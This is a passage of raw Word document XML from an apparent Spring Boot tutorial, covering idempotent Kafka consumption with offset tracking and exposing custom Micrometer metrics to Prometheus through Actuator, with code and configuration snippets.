          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In Kafka, the consumer offset can be stored in Kafka itself or in an external database to guarantee that messages are not reprocessed if consumed more than once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CF9DF2"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EAFFDD"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lastRenderedPageBreak/>
        <w:t>@Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0366AEE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public class KafkaConsumerService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1550CA28" w14:textId="77777777" w:rsidR="009455B4" w:rsidRPr="009455B4" w:rsidRDefault="009455B4" w:rsidP="009455B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57682C2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KafkaListener(topics = "your-topic-name", groupId = "your-consumer-group")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5271F8C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ublic void consumeMessage(String message, @Header(KafkaHeaders.OFFSET) long offset) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7960ED3C"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Here, you can track message offsets in a persistent store to ensure idempotency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167A10E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boolean alreadyProcessed = offsetRepository.existsByOffset(offset);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E8574C" w14:textId="77777777" w:rsidR="009455B4" w:rsidRPr="009455B4" w:rsidRDefault="009455B4" w:rsidP="009455B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6369DA78"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if (alreadyProcessed) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEF21F4"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Duplicate message detected, skipping processing.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F6913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return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2DC35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22AB008D" w14:textId="77777777" w:rsidR="009455B4" w:rsidRPr="009455B4" w:rsidRDefault="009455B4" w:rsidP="009455B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1540D9F2"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Process the message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F5DFA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ocessMessage(message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A91A8C4" w14:textId="77777777" w:rsidR="009455B4" w:rsidRPr="009455B4" w:rsidRDefault="009455B4" w:rsidP="009455B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0104295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Mark the offset as processed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B3BD8A"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offsetRepository.save(new ProcessedOffset(offset));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657B080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3BF1243E" w14:textId="77777777" w:rsidR="009455B4" w:rsidRPr="009455B4" w:rsidRDefault="009455B4" w:rsidP="009455B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D08393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private void processMessage(String message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F86B80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 Your message processing logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4F03B0"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System.out.println("Processing message: " + message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184D6FA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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC0FEA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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF74F13"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In this example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA15B19"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The offset is stored in an external database, and duplicate messages are avoided by checking whether the offset has been processed before.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6230CE0F"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FD667">
          <v:rect id="_x0000_i2863" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="055DF895"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3. Additional Tips for Idempotency in Messaging Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01162B8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dempotent Message Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="009455B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If your message content contains sensitive operations like payments or database writes, make sure the operation can safely be repeated without side effects. For example, updating an existing record is safer than creating a new one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A905A6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Idempotent Key Generation</w:t>
      </w:r>
      <w:r w:rsidRPr="009455B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure that the message ID is generated in a way that it’s unique and deterministic based on the message content, reducing the chances of collision.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE99131"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Distributed Locks</w:t>
      </w:r>
      <w:r w:rsidRPr="009455B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For high concurrency scenarios where multiple consumers may attempt to process the same message, consider using distributed locks (e.g., Redis or database locks) to ensure only one consumer processes a message at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0173CD56" w14:textId="77777777" w:rsidR="009455B4" w:rsidRPr="009455B4" w:rsidRDefault="00000000" w:rsidP="009455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0E790">
          <v:rect id="_x0000_i2864" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="52990920" w14:textId="77777777" w:rsidR="009455B4" w:rsidRPr="009455B4" w:rsidRDefault="009455B4" w:rsidP="009455B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009455B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>4. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FFE2E6"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To ensure </w:t>
      </w:r>
      <w:r w:rsidRPr="009455B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>idempotent message consumption</w:t>
      </w:r>
      <w:r w:rsidRPr="009455B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB0616E"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Use a unique message identifier for each message and track the ID in a persistent store (like a database).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B96848F"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efore processing a message, check if it has already been processed. If yes, skip the processing; otherwise, process it and store its ID as processed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58686CB7"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For Kafka, utilize offset tracking to ensure each message is processed once and only once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391F919B"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 xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="009455B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>upsert</w:t>
      </w:r>
      <w:r w:rsidRPr="009455B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> operations for database-centric solutions, and leverage Kafka’s Exactly Once Semantics for strong guarantees.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B21BB15" w14:textId="77777777" w:rsidR="009455B4" w:rsidRPr="009455B4" w:rsidRDefault="009455B4" w:rsidP="009455B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009455B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>By implementing these strategies, you ensure that your Spring Boot microservices handle messages idempotently, preventing any side effects caused by message duplication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B493473"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6A2B84">
          <v:rect id="_x0000_i2865" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="726E083A" w14:textId="193EBDE0"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7" w:name="_Toc197867911"/>
      <w:r w:rsidRPr="00414D65">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">How do you make sure with Spring Boot application to expose custom application metrics an example compatible with </w:t>
      </w:r>
      <w:r w:rsidR="009455B4" w:rsidRPr="00414D65">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Prometheus</w:t>
      </w:r>
      <w:r w:rsidR="00187C12" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="697"/>
    </w:p>
    <w:p w14:paraId="6C7B7D42" w14:textId="48AB1869" w:rsidR="00686558" w:rsidRPr="00686558" w:rsidRDefault="00686558" w:rsidP="00955508">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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To expose custom application metrics from your </w:t>
      </w:r>
      <w:r w:rsidRPr="00686558">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Boot</w:t>
      </w:r>
      <w:r w:rsidRPr="00686558">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> application that are compatible with </w:t>
      </w:r>
      <w:r w:rsidRPr="00686558">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Prometheus</w:t>
      </w:r>
      <w:r w:rsidRPr="00686558">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, you can use the </w:t>
      </w:r>
      <w:r w:rsidRPr="00686558">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Micrometer</w:t>
      </w:r>
      <w:r w:rsidRPr="00686558">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> library, which integrates seamlessly with Spring Boot and supports Prometheus as a monitoring system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58813D1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Here’s how you can do it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7110AB2F"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434DD">
          <v:rect id="_x0000_i2866" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="27842D80"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1. Add Required Dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D2520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You need to include the following dependencies in your pom.xml (for Maven) or build.gradle (for Gradle) file to set up Prometheus support.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A2B2A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Maven (pom.xml)</w:t>
      </w:r>
      <w:r w:rsidRPr="00686558">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73ACD37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83A30E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groupId&gt;io.micrometer&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B74287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artifactId&gt;micrometer-registry-prometheus&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3240A5A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751F1A6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543F5F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groupId&gt;org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B40195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lt;artifactId&gt;spring-boot-starter-actuator&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4517F35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lt;/dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DE61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Gradle (build.gradle)</w:t>
      </w:r>
      <w:r w:rsidRPr="00686558">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685A436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lementation 'io.micrometer:micrometer-registry-prometheus'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D9532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lementation 'org.springframework.boot:spring-boot-starter-actuator'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515920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icrometer-registry-prometheus: This dependency exposes the application metrics to Prometheus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634CDD9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pring-boot-starter-actuator: This enables the Actuator endpoints for monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DE1119"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CD12F">
          <v:rect id="_x0000_i2867" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6042AFBE"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2. Enable Prometheus Endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795CE6A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pring Boot Actuator provides several endpoints for monitoring your application. You need to enable the /actuator/prometheus endpoint to expose the metrics in a format Prometheus can scrape.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0ABF8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Add the following to your application.properties or application.yml:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4362BD4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properties</w:t>
      </w:r>
      <w:r w:rsidRPr="00686558">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E03B31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s.web.exposure.include=health,info,prometheus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFA6DF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prometheus.enabled=true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5858A8A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Or if you're using application.yml:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4B741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yml</w:t>
      </w:r>
      <w:r w:rsidRPr="00686558">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B1C3F7"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB7AF4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dpoints:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CAFFE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eb:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC7BF4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xposure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C01940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include: health,info,prometheus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2399BCB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dpoint:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE8C9C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ometheus:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C92FF8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enabled: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6215D7"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is configuration makes the /actuator/prometheus endpoint available, which Prometheus can scrape to collect application metrics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13ECC89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41DC2E">
          <v:rect id="_x0000_i2868" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD87A35"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3. Expose Custom Metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D5414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You can create custom metrics using </w:t>
      </w:r>
      <w:r w:rsidRPr="00686558">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Micrometer</w:t>
      </w:r>
      <w:r w:rsidRPr="00686558">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and expose them via the Actuator endpoints. Here’s an example of how to create a custom counter metric and expose it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34365514"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a. Create a Custom Metric Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236AA5B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n your Spring Boot service, you can inject MeterRegistry to create custom metrics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6492A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Counter;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265B18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MeterRegistry;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD3BEF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org.springframework.stereotype.Service;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49524760" w14:textId="77777777" w:rsidR="00686558" w:rsidRPr="00686558" w:rsidRDefault="00686558" w:rsidP="00686558">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7488FD7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ervice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466FFAD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ublic class CustomMetricsService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F80B9C" w14:textId="77777777" w:rsidR="00686558" w:rsidRPr="00686558" w:rsidRDefault="00686558" w:rsidP="00686558">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56E24E4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ivate final Counter customCounter;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E16470" w14:textId="77777777" w:rsidR="00686558" w:rsidRPr="00686558" w:rsidRDefault="00686558" w:rsidP="00686558">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BD6FF7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CustomMetricsService(MeterRegistry meterRegistry) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62127B5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Create a custom counter metric</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1200D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 xml:space="preserve">        this.customCounter = meterRegistry.counter("custom_metric_counter", "type", "example");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB7CC5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692800E5" w14:textId="77777777" w:rsidR="00686558" w:rsidRPr="00686558" w:rsidRDefault="00686558" w:rsidP="00686558">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EB74DB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void incrementCustomCounter() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192D87B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Increment the custom counter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BBC18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customCounter.increment();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FC60A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28142C1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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EBC42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n this example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D19BB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e use MeterRegistry to register a custom counter called custom_metric_counter with a tag type=example.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4F52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e incrementCustomCounter() method increments this counter whenever it is called.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6127AF60"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b. Trigger Custom Metric Updates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7FE53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You can call incrementCustomCounter() wherever required in your application, for example, when processing a certain request or performing an operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27896C0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89DF6">
          <v:rect id="_x0000_i2869" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E02752D"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4. Exposing the Metrics to Prometheus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F562C5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ith the /actuator/prometheus endpoint enabled and custom metrics defined, your Spring Boot application will expose metrics that Prometheus can scrape.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F0F70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For example, if you call http://localhost:8080/actuator/prometheus, it will return a list of metrics in Prometheus-compatible format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0240A79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Here’s what the output might look like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05696D7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HELP jvm_memory_bytes_used Bytes used for memory management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38988D5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TYPE jvm_memory_bytes_used gauge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F73857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jvm_memory_bytes_used{area="heap",id="PS Old Gen",} 720897024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD4C1C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jvm_memory_bytes_used{area="heap",id="PS Eden Space",} 104857600</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061A15E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HELP custom_metric_counter The custom metric counter example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C7245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TYPE custom_metric_counter counter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCB281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ustom_metric_counter{type="example"} 5.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCE543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rometheus will scrape these metrics at a regular interval and store them in its time-series database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5982D6D1"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C0CA9F">
          <v:rect id="_x0000_i2870" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B77F95A"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5. Configure Prometheus to Scrape the Metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A5BAF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In your </w:t>
      </w:r>
      <w:r w:rsidRPr="00686558">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Prometheus configuration file</w:t>
      </w:r>
      <w:r w:rsidRPr="00686558">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (prometheus.yml), add the target to scrape your Spring Boot application's Prometheus endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3502D506"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Example prometheus.yml:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B3169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crape_configs:</w:t>
      </w:r>
    </w:p>
